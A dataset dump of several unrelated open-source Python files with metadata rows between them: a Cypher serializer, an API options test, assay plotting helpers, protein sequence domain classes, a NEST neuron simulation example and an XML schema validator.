|
gpl-2.0
| 6,787,627,537,322,967,000
| 30.440252
| 100
| 0.582784
| false
| 3.928408
| false
| false
| false
|
nigelsmall/py2neo
|
py2neo/database/cypher.py
|
1
|
6889
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright 2011-2016, Nigel Small
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from io import StringIO
from json import dumps as json_dumps
from sys import stdout
from py2neo.compat import ustr
from py2neo.types import Node, Relationship, Path
from py2neo.util import is_collection
class CypherWriter(object):
""" Writer for Cypher data. This can be used to write to any
file-like object, such as standard output.
"""
safe_first_chars = u"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_"
safe_chars = u"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_"
default_sequence_separator = u","
default_key_value_separator = u":"
def __init__(self, file=None, **kwargs):
self.file = file or stdout
self.sequence_separator = kwargs.get("sequence_separator", self.default_sequence_separator)
self.key_value_separator = \
kwargs.get("key_value_separator", self.default_key_value_separator)
def write(self, obj):
""" Write any entity, value or collection.
:arg obj:
"""
if obj is None:
pass
elif isinstance(obj, Node):
self.write_node(obj)
elif isinstance(obj, Relationship):
self.write_relationship(obj)
elif isinstance(obj, Path):
self.write_walkable(obj)
elif isinstance(obj, dict):
self.write_map(obj)
elif is_collection(obj):
self.write_list(obj)
else:
self.write_value(obj)
def write_value(self, value):
""" Write a value.
:arg value:
"""
self.file.write(ustr(json_dumps(value, ensure_ascii=False)))
def write_identifier(self, identifier):
""" Write an identifier.
:arg identifier:
"""
if not identifier:
raise ValueError("Invalid identifier")
identifier = ustr(identifier)
safe = (identifier[0] in self.safe_first_chars and
all(ch in self.safe_chars for ch in identifier[1:]))
if not safe:
self.file.write(u"`")
self.file.write(identifier.replace(u"`", u"``"))
self.file.write(u"`")
else:
self.file.write(identifier)
def write_list(self, collection):
""" Write a list.
:arg collection:
"""
self.file.write(u"[")
link = u""
for value in collection:
self.file.write(link)
self.write(value)
link = self.sequence_separator
self.file.write(u"]")
def write_literal(self, text):
""" Write literal text.
:arg text:
"""
self.file.write(ustr(text))
def write_map(self, mapping, private=False):
""" Write a map.
:arg mapping:
:arg private:
"""
self.file.write(u"{")
link = u""
for key, value in sorted(dict(mapping).items()):
if key.startswith("_") and not private:
continue
self.file.write(link)
self.write_identifier(key)
self.file.write(self.key_value_separator)
self.write(value)
link = self.sequence_separator
self.file.write(u"}")
def write_node(self, node, name=None, full=True):
""" Write a node.
:arg node:
:arg name:
:arg full:
"""
self.file.write(u"(")
if name is None:
name = node.__name__
self.write_identifier(name)
if full:
for label in sorted(node.labels()):
self.write_literal(u":")
self.write_identifier(label)
if node:
self.file.write(u" ")
self.write_map(dict(node))
self.file.write(u")")
def write_relationship(self, relationship, name=None):
""" Write a relationship (including nodes).
:arg relationship:
:arg name:
"""
self.write_node(relationship.start_node(), full=False)
self.file.write(u"-")
self.write_relationship_detail(relationship, name)
self.file.write(u"->")
self.write_node(relationship.end_node(), full=False)
def write_relationship_detail(self, relationship, name=None):
""" Write a relationship (excluding nodes).
:arg relationship:
:arg name:
"""
self.file.write(u"[")
if name is not None:
self.write_identifier(name)
if type:
self.file.write(u":")
self.write_identifier(relationship.type())
if relationship:
self.file.write(u" ")
self.write_map(relationship)
self.file.write(u"]")
def write_subgraph(self, subgraph):
""" Write a subgraph.
:arg subgraph:
"""
self.write_literal("({")
for i, node in enumerate(subgraph.nodes()):
if i > 0:
self.write_literal(", ")
self.write_node(node)
self.write_literal("}, {")
for i, relationship in enumerate(subgraph.relationships()):
if i > 0:
self.write_literal(", ")
self.write_relationship(relationship)
self.write_literal("})")
def write_walkable(self, walkable):
""" Write a walkable.
:arg walkable:
"""
nodes = walkable.nodes()
for i, relationship in enumerate(walkable):
node = nodes[i]
self.write_node(node, full=False)
forward = relationship.start_node() == node
self.file.write(u"-" if forward else u"<-")
self.write_relationship_detail(relationship)
self.file.write(u"->" if forward else u"-")
self.write_node(nodes[-1], full=False)
def cypher_escape(identifier):
""" Escape a Cypher identifier in backticks.
::
>>> cypher_escape("this is a `label`")
'`this is a ``label```'
:arg identifier:
"""
s = StringIO()
writer = CypherWriter(s)
writer.write_identifier(identifier)
return s.getvalue()
def cypher_repr(obj):
""" Generate the Cypher representation of an object.
:arg obj:
"""
s = StringIO()
writer = CypherWriter(s)
writer.write(obj)
return s.getvalue()
|
apache-2.0
| 8,277,273,479,301,094,000
| 28.566524
| 99
| 0.575555
| false
| 4.076331
| false
| false
| false
|
alex/changes
|
tests/changes/api/test_system_options.py
|
1
|
1427
|
from changes.config import db
from changes.models import SystemOption
from changes.testutils import APITestCase
class SystemOptionsListTest(APITestCase):
def test_simple(self):
path = '/api/0/systemoptions/'
resp = self.client.get(path)
assert resp.status_code == 200
data = self.unserialize(resp)
assert data['system.message'] == ''
db.session.add(SystemOption(
name='system.message',
value='hello',
))
db.session.commit()
resp = self.client.get(path)
assert resp.status_code == 200
data = self.unserialize(resp)
assert data['system.message'] == 'hello'
class SystemOptionsUpdateTest(APITestCase):
def test_simple(self):
path = '/api/0/systemoptions/'
resp = self.client.post(path, data={
'system.message': 'hello',
})
assert resp.status_code == 401
self.login_default()
resp = self.client.post(path, data={
'system.message': 'hello',
})
assert resp.status_code == 403
self.login_default_admin()
resp = self.client.post(path, data={
'system.message': 'hello',
})
assert resp.status_code == 200
options = dict(db.session.query(
SystemOption.name, SystemOption.value
))
assert options.get('system.message') == 'hello'
|
apache-2.0
| -5,700,007,956,722,778,000
| 25.425926
| 55
| 0.58164
| false
| 4.077143
| true
| false
| false
|
chiffa/Pharmacosensitivity_growth_assays
|
src/plot_drawings.py
|
1
|
5857
|
import numpy as np
from matplotlib import pyplot as plt
from chiffatools.linalg_routines import rm_nans
from chiffatools.dataviz import better2D_desisty_plot
import supporting_functions as SF
from scipy import stats
def quick_hist(data):
plt.hist(np.log10(rm_nans(data)), bins=20)
plt.show()
def show_2d_array(data):
plt.imshow(data, interpolation='nearest', cmap='coolwarm')
plt.colorbar()
plt.show()
def correlation_plot(x, y):
plt.plot(x, y, '.k')
plt.show()
better2D_desisty_plot(x, y)
plt.show()
slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)
print "r-squared:", r_value**2
def raw_plot(values, full_values, concentrations, noise_level, color):
m_i = values.shape[0]
m_j = values.shape[2]
ax = plt.subplot(111)
ax.set_xscale('log')
msk = concentrations == 0.0
concentrations[msk] = np.min(concentrations[np.logical_not(msk)])/4
if type(noise_level) == np.float64 or type(noise_level) == float:
errs = np.empty_like(values)
errs.fill(noise_level)
errs = [errs, errs]
if type(noise_level) == np.ndarray:
errs = [noise_level, noise_level]
if type(noise_level) == tuple:
errs = [noise_level[0], noise_level[1]]
for i in range(0, m_i):
for j in range(0, m_j):
# temp_concs = concentrations
temp_concs = concentrations*np.random.uniform(0.95, 1.05, 1)
nan_mask = np.logical_not(np.isnan(full_values[i, :, j]))
plt.errorbar(temp_concs[nan_mask], full_values[i, nan_mask, j],
yerr=[errs[0][i, nan_mask, j], errs[1][i, nan_mask, j]], fmt='.', color=color, alpha=0.25)
plt.errorbar(temp_concs[nan_mask], values[i, nan_mask, j],
yerr=[errs[0][i, nan_mask, j], errs[1][i, nan_mask, j]], fmt='.', color=color)
def summary_plot(means, mean_err, concentrations, anchor, color='black', legend='', nofill=False):
# TODO: inject nan to mark that the control is different from the main sequence.
ax = plt.subplot(111)
ax.set_xscale('log')
nanmask = np.logical_not(np.isnan(means))
if not np.all(np.logical_not(nanmask)):
concentrations[0] = anchor
plt.errorbar(concentrations[nanmask], means[nanmask], yerr=mean_err[nanmask], color=color, label=legend)
ymax = means[nanmask] + mean_err[nanmask]
ymin = means[nanmask] - mean_err[nanmask]
if not nofill:
plt.fill_between(concentrations[nanmask], ymax, ymin, facecolor=color, alpha=0.25)
def vector_summary_plot(means_array, error_array, concentrations_array, anchor, legend_array=None, color='black'):
if legend_array is None:
legend_array = np.zeros_like(means_array[:, 0])
for i in range(0, means_array.shape[0]):
nanmask = np.logical_not(np.isnan(means_array[i, :]))
if not np.all(np.logical_not(nanmask)):
summary_plot(means_array[i, nanmask], error_array[i, nanmask], concentrations_array[i, nanmask], anchor, color, legend_array[i])
def pretty_gradual_plot(data, concentrations, strain_name_map, drug_name, blank_line=200):
def inner_scatter_plot(mean, std, relative, limiter=4):
series = np.zeros(mean.shape)
cell_type = np.zeros(mean.shape)
for i, name in enumerate(names):
series[i, :] = np.arange(i, c.shape[0]*(len(names)+40)+i, len(names)+40)
cell_type[i, :] = i
plt.scatter(series[i, :], mean[i, :], c=cm(i/float(len(names))), s=35, label=name)
plt.errorbar(series.flatten(), mean.flatten(), yerr=std.flatten(), fmt=None, capsize=0)
plt.xticks(np.mean(series, axis=0), c)
plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3, ncol=len(names)/limiter, mode="expand", borderaxespad=0.,prop={'size':6})
if not relative:
plt.axhline(y=blank_line)
plt.show()
filter = np.all(np.logical_not(np.isnan(data)), axis=(1, 2))
names = [strain_name_map[i] for i in filter.nonzero()[0].tolist()]
c = concentrations[filter, :][0, :]
mean = np.nanmean(data[filter, :, :], axis=-1)
std = np.nanstd(data[filter, :, :], axis=-1)
cm = plt.cm.get_cmap('spectral')
refmean = mean[:, 0].reshape((mean.shape[0], 1))
refstd = std[:, 0].reshape((mean.shape[0], 1))
rel_mean, rel_std = (mean/refmean, np.sqrt(np.power(refstd, 2)+np.power(std, 2))/mean)
inner_scatter_plot(mean, std, False)
inner_scatter_plot(rel_mean, rel_std, True)
mean_mean = np.nanmean(mean, axis=0)
std_mean = np.nanstd(mean, axis=0)
mean_std = np.nanmean(std, axis=0)
total_std = np.sqrt(np.power(std_mean, 2) + np.power(mean_std, 2))
confusables = np.sum(mean - std < blank_line, axis=0) / float(len(names))
rel_mean_mean = np.nanmean(rel_mean, axis=0)
rel_std_mean = np.nanstd(rel_mean, axis=0)
rel_mean_std = np.nanmean(rel_std, axis=0)
rel_total_std = np.sqrt(np.power(rel_std_mean, 2) + np.power(rel_mean_std, 2))
plt.subplot(212)
plt.plot(mean_mean, c=cm(0.00), label='mean of mean')
plt.plot(mean_std, c=cm(.25), label='mean of std')
plt.plot(std_mean, c=cm(.50), label='std of mean')
plt.plot(total_std, c=cm(0.75), label='total std')
# plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3, mode="expand", borderaxespad=0.,prop={'size':8})
plt.axhline(y=blank_line)
plt.subplot(211)
plt.plot(rel_mean_mean, c=cm(0.00), label='mean of mean')
plt.plot(rel_mean_std, c=cm(.25), label='mean of std')
plt.plot(rel_std_mean, c=cm(.50), label='std of mean')
plt.plot(rel_total_std, c=cm(0.75), label='total std')
plt.plot(confusables, c=cm(0.9), label='confusable with null')
plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3, mode="expand", borderaxespad=0.,prop={'size':8})
plt.show()
|
bsd-3-clause
| -7,508,849,187,087,418,000
| 38.85034
| 140
| 0.621137
| false
| 2.86126
| false
| false
| false
|
google-research/google-research
|
protein_lm/domains.py
|
1
|
14044
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Specifications for different types of input/output domains."""
import abc
import collections
import gin
import numpy as np
import six
from six.moves import range
from protein_lm import seq_utils
from protein_lm import utils
BOS_TOKEN = '<' # Beginning of sequence token.
EOS_TOKEN = '>' # End of sequence token.
PAD_TOKEN = '_' # End of sequence token.
MASK_TOKEN = '*' # End of sequence token.
SEP_TOKEN = '|' # A special token for separating tokens for serialization.
@gin.configurable
class Vocabulary(object):
"""Basic vocabulary used to represent output tokens for domains."""
def __init__(self,
tokens,
include_bos=False,
include_eos=False,
include_pad=False,
include_mask=False,
bos_token=BOS_TOKEN,
eos_token=EOS_TOKEN,
pad_token=PAD_TOKEN,
mask_token=MASK_TOKEN):
"""A token vocabulary.
Args:
tokens: An list of tokens to put in the vocab. If an int, will be
interpreted as the number of tokens and '0', ..., 'tokens-1' will be
used as tokens.
include_bos: Whether to append `bos_token` to `tokens` that marks the
beginning of a sequence.
include_eos: Whether to append `eos_token` to `tokens` that marks the
end of a sequence.
include_pad: Whether to append `pad_token` to `tokens` to marks past end
of sequence.
include_mask: Whether to append `mask_token` to `tokens` to mark masked
positions.
bos_token: A special token than marks the beginning of sequence.
Ignored if `include_bos == False`.
eos_token: A special token than marks the end of sequence.
Ignored if `include_eos == False`.
pad_token: A special token than marks past the end of sequence.
Ignored if `include_pad == False`.
mask_token: A special token than marks MASKED positions for e.g. BERT.
Ignored if `include_mask == False`.
"""
if not isinstance(tokens, collections.Iterable):
tokens = range(tokens)
tokens = [str(token) for token in tokens]
if include_bos:
tokens.append(bos_token)
if include_eos:
tokens.append(eos_token)
if include_pad:
tokens.append(pad_token)
if include_mask:
tokens.append(mask_token)
if len(set(tokens)) != len(tokens):
raise ValueError('tokens not unique!')
special_tokens = sorted(set(tokens) & set([SEP_TOKEN]))
if special_tokens:
raise ValueError(
f'tokens contains reserved special tokens: {special_tokens}!')
self._tokens = tokens
self._token_ids = list(range(len(self._tokens)))
self._id_to_token = collections.OrderedDict(
zip(self._token_ids, self._tokens))
self._token_to_id = collections.OrderedDict(
zip(self._tokens, self._token_ids))
self._bos_token = bos_token if include_bos else None
self._eos_token = eos_token if include_eos else None
self._mask_token = mask_token if include_mask else None
self._pad_token = pad_token if include_pad else None
def __len__(self):
return len(self._tokens)
@property
def tokens(self):
"""Return the tokens of the vocabulary."""
return list(self._tokens)
@property
def token_ids(self):
"""Return the tokens ids of the vocabulary."""
return list(self._token_ids)
@property
def bos(self):
"""Returns the index of the BOS token or None if unspecified."""
return (None if self._bos_token is None else
self._token_to_id[self._bos_token])
@property
def eos(self):
"""Returns the index of the EOS token or None if unspecified."""
return (None if self._eos_token is None else
self._token_to_id[self._eos_token])
@property
def mask(self):
"""Returns the index of the MASK token or None if unspecified."""
return (None if self._mask_token is None else
self._token_to_id[self._mask_token])
@property
def pad(self):
"""Returns the index of the PAD token or None if unspecified."""
return (None
if self._pad_token is None else self._token_to_id[self._pad_token])
def is_valid(self, value):
"""Tests if a value is a valid token id and returns a bool."""
return value in self._token_ids
def are_valid(self, values):
"""Tests if values are valid token ids and returns an array of bools."""
return np.array([self.is_valid(value) for value in values])
def encode(self, tokens):
"""Maps an iterable of string tokens to a list of integer token ids."""
if six.PY3 and isinstance(tokens, bytes):
# Always use Unicode in Python 3.
tokens = tokens.decode('utf-8')
return [self._token_to_id[token] for token in tokens]
def decode(self, values, stop_at_eos=False, as_str=True):
"""Maps an iterable of integer token ids to string tokens.
Args:
values: An iterable of token ids.
stop_at_eos: Whether to ignore all values after the first EOS token id.
as_str: Whether to return a list of tokens or a concatenated string.
Returns:
A string of tokens or a list of tokens if `as_str == False`.
"""
if stop_at_eos and self.eos is None:
raise ValueError('EOS unspecified!')
tokens = []
for value in values:
value = int(value) # Requires if value is a scalar tensor.
if stop_at_eos and value == self.eos:
break
tokens.append(self._id_to_token[value])
return ''.join(tokens) if as_str else tokens
@gin.configurable
class ProteinVocab(Vocabulary):
"""A `Vocabulary` with amino acid tokens."""
def __init__(self,
include_anomalous_amino_acids=False,
include_align_tokens=False,
**kwargs):
"""Creates an instance of this class.
Args:
include_anomalous_amino_acids: A bool indicating whether to also include
the set of anomalous amino acids (vs. to use the standard ones only).
include_align_tokens: A bool indicating whether to also include the tokens
required to represent (fixed-length) aligned sequences.
**kwargs: Named parameters to be passed to the base class.
"""
tokens = list(seq_utils.AA_TOKENS)
if include_anomalous_amino_acids:
tokens += list(seq_utils.AA_ANOMALOUS_TOKENS)
if include_align_tokens:
tokens += list(seq_utils.AA_ALIGN_TOKENS)
super(ProteinVocab, self).__init__(tokens=tokens, **kwargs)
@six.add_metaclass(abc.ABCMeta)
class Domain(object):
"""Base class of problem domains, which specifies the set of valid objects."""
@property
def mask_fn(self):
"""Returns a masking function or None."""
@abc.abstractmethod
def is_valid(self, sample):
"""Tests if the given sample is valid for this domain."""
def are_valid(self, samples):
"""Tests if the given samples are valid for this domain."""
return np.array([self.is_valid(sample) for sample in samples])
class DiscreteDomain(Domain):
"""Base class for discrete domains: sequences of categorical variables."""
def __init__(self, vocab):
self._vocab = vocab
@property
def vocab_size(self):
return len(self.vocab)
@property
def vocab(self):
return self._vocab
def encode(self, samples, **kwargs):
"""Maps a list of string tokens to a list of lists of integer token ids."""
return [self.vocab.encode(sample, **kwargs) for sample in samples]
def decode(self, samples, **kwargs):
"""Maps list of lists of integer token ids to list of strings."""
return [self.vocab.decode(sample, **kwargs) for sample in samples]
@gin.configurable
class FixedLengthDiscreteDomain(DiscreteDomain):
"""Output is a fixed length discrete sequence."""
def __init__(self, vocab_size=None, length=None, vocab=None):
"""Creates an instance of this class.
Args:
vocab_size: An optional integer for constructing a vocab of this size.
If provided, `vocab` must be `None`.
length: The length of the domain (required).
vocab: The `Vocabulary` of the domain. If provided, `vocab_size` must be
`None`.
Raises:
ValueError: If neither `vocab_size` nor `vocab` is provided.
ValueError: If `length` if not provided.
"""
if length is None:
raise ValueError('length must be provided!')
if not (vocab_size is None) ^ (vocab is None):
raise ValueError('Exactly one of vocab_size of vocab must be specified!')
self._length = length
if vocab is None:
vocab = Vocabulary(vocab_size)
super(FixedLengthDiscreteDomain, self).__init__(vocab)
@property
def length(self):
return self._length
@property
def size(self):
"""The number of structures in the Domain."""
return self.vocab_size**self.length
def is_valid(self, sequence):
return len(sequence) == self.length and self.vocab.are_valid(sequence).all()
def sample_uniformly(self, num_samples, seed=None):
random_state = utils.get_random_state(seed)
return np.int32(
random_state.randint(
size=[num_samples, self.length], low=0, high=self.vocab_size))
def index_to_structure(self, index):
"""Given an integer and target length, encode into structure."""
structure = np.zeros(self.length, dtype=np.int32)
tokens = [int(token, base=len(self.vocab))
for token in np.base_repr(index, base=len(self.vocab))]
structure[-len(tokens):] = tokens
return structure
def structure_to_index(self, structure):
"""Returns the index of a sequence over a vocabulary of size `vocab_size`."""
structure = np.asarray(structure)[::-1]
return np.sum(structure * np.power(len(self.vocab), range(len(structure))))
@gin.configurable
class VariableLengthDiscreteDomain(FixedLengthDiscreteDomain):
"""A domain for variable-length sequences."""
def __init__(self, vocab, length, min_length=0):
"""Creates an instance of this class.
Args:
vocab: An instance of a `Vocabulary` with an EOS token.
length: The maximum sequence length.
min_length: The minimum sequence length.
Raises:
ValueError: If `vocab` does not have an EOS token.
"""
if vocab.eos is None:
raise ValueError('vocab must have an EOS token!')
super(VariableLengthDiscreteDomain, self).__init__(
length=length, vocab=vocab)
self._min_length = min_length
@property
def length(self):
return self._length
@property
def min_length(self):
return self._min_length
def is_valid(self, sequence):
"""Tests if `sequences` are valid for this domain."""
unpadded_seq = seq_utils.unpad_sequences([sequence], self.vocab.eos)[0]
return (len(unpadded_seq) >= self.min_length and
len(unpadded_seq) <= self.length and
self.vocab.are_valid(sequence).all() and
seq_utils.sequences_end_with_value([sequence], self.vocab.eos)[0])
def encode(self, sequences, pad=True):
"""Integer-encodes sequences and optionally pads them."""
encoded = [self.vocab.encode(seq) for seq in sequences]
if pad:
encoded = seq_utils.pad_sequences(encoded, self.length, self.vocab.eos)
return encoded
def decode(self, sequences, stop_at_eos=True, **kwargs):
"""Integer-encodes sequences and optionally pads them."""
return [self.vocab.decode(seq, stop_at_eos=stop_at_eos, **kwargs)
for seq in sequences]
def sample_uniformly(self,
num_samples,
min_seq_len=None,
max_seq_len=None,
pad=True,
seed=None):
"""Samples valid integer-encoded sequences from the domain.
Args:
num_samples: The number of samples.
min_seq_len: The minimum sequence length of samples (inclusive).
max_seq_len: The maximum sequence length of samples (inclusive).
pad: Whether to pad sequences to the maximum length.
seed: Optional seed of the random number generator.
Returns:
A list with `num_samples` samples.
"""
if min_seq_len is None:
min_seq_len = self.min_length
if max_seq_len is None:
max_seq_len = self.length
random_state = utils.get_random_state(seed)
valid_token_ids = np.delete(self.vocab.token_ids, self.vocab.eos)
lengths = random_state.randint(min_seq_len, max_seq_len + 1, num_samples)
seqs = [random_state.choice(valid_token_ids, length)
for length in lengths]
if pad:
seqs = seq_utils.pad_sequences(seqs, self.length, self.vocab.eos)
return seqs
def is_discrete(domain):
"""Returns a bool indicating whether `domain` is discrete."""
return isinstance(domain, DiscreteDomain)
def check_if_discrete(domain):
"""Raises an exception if `domain` is not discrete."""
if not is_discrete(domain):
raise ValueError('Discrete domain expected!')
def is_variable_length(domain):
"""Returns a bool indicating whether `domain` is variable-length."""
return isinstance(domain, VariableLengthDiscreteDomain)
def domain_to_bos(domain):
"""Returns a pre-specified start-sequence symbol or a new symbol (len(vocab)).
If a new symbol is returned, it's not added to the vocabulary (only used as
input at the beginning of sequence).
Args:
domain: The problem's Domain instance.
"""
vocab = domain.vocab
return len(vocab) if vocab.bos is None else vocab.bos
|
apache-2.0
| -4,031,687,846,241,752,000
| 33.421569
| 81
| 0.662489
| false
| 3.82879
| false
| false
| false
|
hakonsbm/nest-simulator
|
pynest/examples/BrodyHopfield.py
|
1
|
4554
|
# -*- coding: utf-8 -*-
#
# BrodyHopfield.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""Spike synchronization through subthreshold oscillation
------------------------------------------------------------
This script reproduces the spike synchronization behavior
of integrate-and-fire neurons in response to a subthreshold
oscillation. This phenomenon is shown in Fig. 1 of [1]_
Neurons receive a weak 35 Hz oscillation, a gaussian noise current
and an increasing DC. The time-locking capability is shown to
depend on the input current given. The result is then plotted using
pylab. All parameters are taken from the above paper.
References
~~~~~~~~~~~~~
.. [1] Brody CD and Hopfield JJ (2003). Simple networks for
spike-timing-based computation, with application to olfactory
processing. Neuron 37, 843-852.
"""
#################################################################################
# First, we import all necessary modules for simulation, analysis, and plotting.
import nest
import nest.raster_plot
###############################################################################
# Second, the simulation parameters are assigned to variables.
N = 1000 # number of neurons
bias_begin = 140. # minimal value for the bias current injection [pA]
bias_end = 200. # maximal value for the bias current injection [pA]
T = 600 # simulation time (ms)
# parameters for the alternative-current generator
driveparams = {'amplitude': 50., 'frequency': 35.}
# parameters for the noise generator
noiseparams = {'mean': 0.0, 'std': 200.}
neuronparams = {'tau_m': 20., # membrane time constant
'V_th': 20., # threshold potential
'E_L': 10., # membrane resting potential
't_ref': 2., # refractory period
'V_reset': 0., # reset potential
'C_m': 200., # membrane capacitance
'V_m': 0.} # initial membrane potential
###############################################################################
# Third, the nodes are created using ``Create``. We store the returned handles
# in variables for later reference.
neurons = nest.Create('iaf_psc_alpha', N)
sd = nest.Create('spike_detector')
noise = nest.Create('noise_generator')
drive = nest.Create('ac_generator')
###############################################################################
# Set the parameters specified above for the generators using ``SetStatus``.
nest.SetStatus(drive, driveparams)
nest.SetStatus(noise, noiseparams)
###############################################################################
# Set the parameters specified above for the neurons. Neurons get an internal
# current. The first neuron additionally receives the current with amplitude
# `bias_begin`, the last neuron with amplitude `bias_end`.
nest.SetStatus(neurons, neuronparams)
nest.SetStatus(neurons, [{'I_e':
(n * (bias_end - bias_begin) / N + bias_begin)}
for n in neurons])
###############################################################################
# Set the parameters for the ``spike_detector``: recorded data should include
# the information about global IDs of spiking neurons and the time of
# individual spikes.
nest.SetStatus(sd, {"withgid": True, "withtime": True})
###############################################################################
# Connect alternative current and noise generators as well as
# spike detectors to neurons
nest.Connect(drive, neurons)
nest.Connect(noise, neurons)
nest.Connect(neurons, sd)
###############################################################################
# Simulate the network for time `T`.
nest.Simulate(T)
###############################################################################
# Plot the raster plot of the neuronal spiking activity.
nest.raster_plot.from_device(sd, hist=True)
|
gpl-2.0
| 3,528,837,289,585,193,000
| 37.923077
| 81
| 0.585859
| false
| 4.387283
| false
| false
| false
|
bschmoker/stix-validator
|
validators/xml_schema.py
|
1
|
7809
|
# Copyright (c) 2014, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
import os
from collections import defaultdict
from lxml import etree
class XmlSchemaValidator(object):
NS_XML_SCHEMA_INSTANCE = "http://www.w3.org/2001/XMLSchema-instance"
NS_XML_SCHEMA = "http://www.w3.org/2001/XMLSchema"
def __init__(self, schema_dir=None):
self.__imports = self._build_imports(schema_dir)
def _get_target_ns(self, fp):
'''Returns the target namespace for a schema file
Keyword Arguments
fp - the path to the schema file
'''
parser = etree.ETCompatXMLParser(huge_tree=True)
tree = etree.parse(fp, parser=parser)
root = tree.getroot()
return root.attrib['targetNamespace'] # throw an error if it
# doesn't exist...we can't
# validate
def _get_include_base_schema(self, list_schemas):
'''Returns the root schema which defines a namespace.
Certain schemas, such as OASIS CIQ use xs:include statements in their
schemas, where two schemas define a namespace (e.g., XAL.xsd and
XAL-types.xsd). This makes validation difficult, when we must refer to
one schema for a given namespace.
To fix this, we attempt to find the root schema which includes the
others. We do this by seeing if a schema has an xs:include element,
and if it does we assume that it is the parent. This is totally wrong
and needs to be fixed. Ideally this would build a tree of includes and
return the root node.
Keyword Arguments:
list_schemas - a list of schema file paths that all belong to the same
namespace
'''
parent_schema = None
tag_include = "{%s}include" % (self.NS_XML_SCHEMA)
for fn in list_schemas:
tree = etree.parse(fn)
root = tree.getroot()
includes = root.findall(tag_include)
if len(includes) > 0: # this is a hack that assumes if the schema
# includes others, it is the base schema for
# the namespace
return fn
return parent_schema
def _build_imports(self, schema_dir):
'''Given a directory of schemas, this builds a dictionary of schemas
that need to be imported under a wrapper schema in order to enable
validation. This returns a dictionary of the form
{namespace : path to schema}.
Keyword Arguments
schema_dir - a directory of schema files
'''
if not schema_dir:
return None
imports = defaultdict(list)
for top, dirs, files in os.walk(schema_dir):
for f in files:
if f.endswith('.xsd'):
fp = os.path.join(top, f)
target_ns = self._get_target_ns(fp)
imports[target_ns].append(fp)
for k, v in imports.iteritems():
if len(v) > 1:
base_schema = self._get_include_base_schema(v)
imports[k] = base_schema
else:
imports[k] = v[0]
return imports
def _build_wrapper_schema(self, import_dict):
'''Creates a wrapper schema that imports all namespaces defined by the
input dictionary. This enables validation of instance documents that
refer to multiple namespaces and schemas
Keyword Arguments
import_dict - a dictionary of the form {namespace : path to schema} that
will be used to build the list of xs:import statements
'''
schema_txt = '''<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"
targetNamespace="http://stix.mitre.org/tools/validator"
elementFormDefault="qualified"
attributeFormDefault="qualified"/>'''
root = etree.fromstring(schema_txt)
tag_import = "{%s}import" % (self.NS_XML_SCHEMA)
for ns, list_schemaloc in import_dict.iteritems():
schemaloc = list_schemaloc
schemaloc = schemaloc.replace("\\", "/")
attrib = {'namespace': ns, 'schemaLocation': schemaloc}
el_import = etree.Element(tag_import, attrib=attrib)
root.append(el_import)
return root
def _extract_schema_locations(self, root):
schemaloc_dict = {}
tag_schemaloc = "{%s}schemaLocation" % (self.NS_XML_SCHEMA_INSTANCE)
schemaloc = root.attrib[tag_schemaloc].split()
schemaloc_pairs = zip(schemaloc[::2], schemaloc[1::2])
for ns, loc in schemaloc_pairs:
schemaloc_dict[ns] = loc
return schemaloc_dict
def _build_result_dict(self, result, errors=None):
d = {}
d['result'] = result
if errors:
if not hasattr(errors, "__iter__"):
errors = [errors]
d['errors'] = errors
return d
def validate(self, doc, schemaloc=False):
'''Validates an instance documents.
Returns a tuple of where the first item is the boolean validation
result and the second is the validation error if there was one.
Keyword Arguments
instance_doc - a filename, file-like object, etree._Element, or
etree._ElementTree to be validated
'''
if not(schemaloc or self.__imports):
return self._build_result_dict(False,
"No schemas to validate "
"against! Try instantiating "
"XmlValidator with "
"use_schemaloc=True or setting the "
"schema_dir param in __init__")
if isinstance(doc, etree._Element):
root = doc
elif isinstance(doc, etree._ElementTree):
root = doc.getroot()
else:
try:
parser = etree.ETCompatXMLParser(huge_tree=True)
tree = etree.parse(doc, parser=parser)
root = tree.getroot()
except etree.XMLSyntaxError as e:
return self._build_result_dict(False, str(e))
if schemaloc:
try:
required_imports = self._extract_schema_locations(root)
except KeyError as e:
return self._build_result_dict(False,
"No schemaLocation attribute "
"set on instance document. "
"Unable to validate")
else:
required_imports = {}
# visit all nodes and gather schemas
for elem in root.iter():
for prefix, ns in elem.nsmap.iteritems():
schema_location = self.__imports.get(ns)
if schema_location:
required_imports[ns] = schema_location
if not required_imports:
return self._build_result_dict(False, "Unable to determine schemas "
"to validate against")
wrapper_schema_doc = self._build_wrapper_schema(import_dict=required_imports)
xmlschema = etree.XMLSchema(wrapper_schema_doc)
isvalid = xmlschema.validate(root)
if isvalid:
return self._build_result_dict(True)
else:
return self._build_result_dict(False,
[str(x) for x in xmlschema.error_log])
|
bsd-3-clause
